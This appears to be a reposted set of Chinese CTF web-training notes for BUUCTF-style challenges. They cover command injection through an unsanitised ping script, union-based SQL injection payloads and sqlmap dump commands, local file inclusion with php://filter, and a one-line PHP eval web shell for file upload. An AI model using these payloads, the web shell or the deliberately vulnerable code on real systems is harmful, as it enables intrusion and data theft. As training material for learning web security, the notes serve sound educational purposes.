Java教程
2021/12/7 WEB基础培训
本文主要是介绍2021/12/7 WEB基础培训,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
培训 WEB (略微提升)
1.exec
BUU
<?php
if (isset($_POST['target']))
{
system("ping -c 3 ".$_POST['target']);
}
?>
2.SQL注入
BUU
?id=1' order by 3--+ ?id=-1' union select 1,database(),3--+ ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='note'--+ ?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='fl4g'--+ ?id=-1' union select 1,2,group_concat(fllllag) from fl4g--+
sqlmap -u "url" sqlmap -u "url" --dbs sqlmap -u "url" -D note --tables sqlmap -u "url" -D note -T fl3g --columns sqlmap -u "url" -D note -T fl4g -C fllllag --dump
3.文件包含(LFI)
3.1
BUU
?P=/flag
<?php
highlight_file(__FILE__);
if(isset($_GET['file'])) {
$str = $_GET['file'];
include $_GET['file'];
}
?>
3.2 php伪协议
BUU
?p=php://filter/convert.base64-encode/resource=flag
4.文件上传
一句话 <?php @eval($_POST["x"]);?>
BUU
上传+文件包含
这篇关于2021/12/7 WEB基础培训的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
Java管理系统项目实战入门教程11-02
-
Java监控系统项目实战教程11-02
-
Java就业项目项目实战:从入门到初级工程师的必备技能11-02
-
Java全端项目实战入门教程11-02
-
Java全栈项目实战:从入门到初级应用11-02
-
Java日志系统项目实战:初学者完全指南11-02
-
Java微服务系统项目实战入门教程11-02
-
Java微服务项目实战:新手入门指南11-02
-
Java项目实战:新手入门教程11-02
-
Java小程序项目实战:从入门到简单应用11-02
-
Java支付系统项目实战入门教程11-02
-
SpringCloud Alibaba项目实战:新手入门教程11-02
-
Swagger项目实战:新手入门教程11-02
-
UNI-APP项目实战:新手入门与初级教程11-02
-
编译部署资料入门教程:一步步学会编译和部署11-02
栏目导航
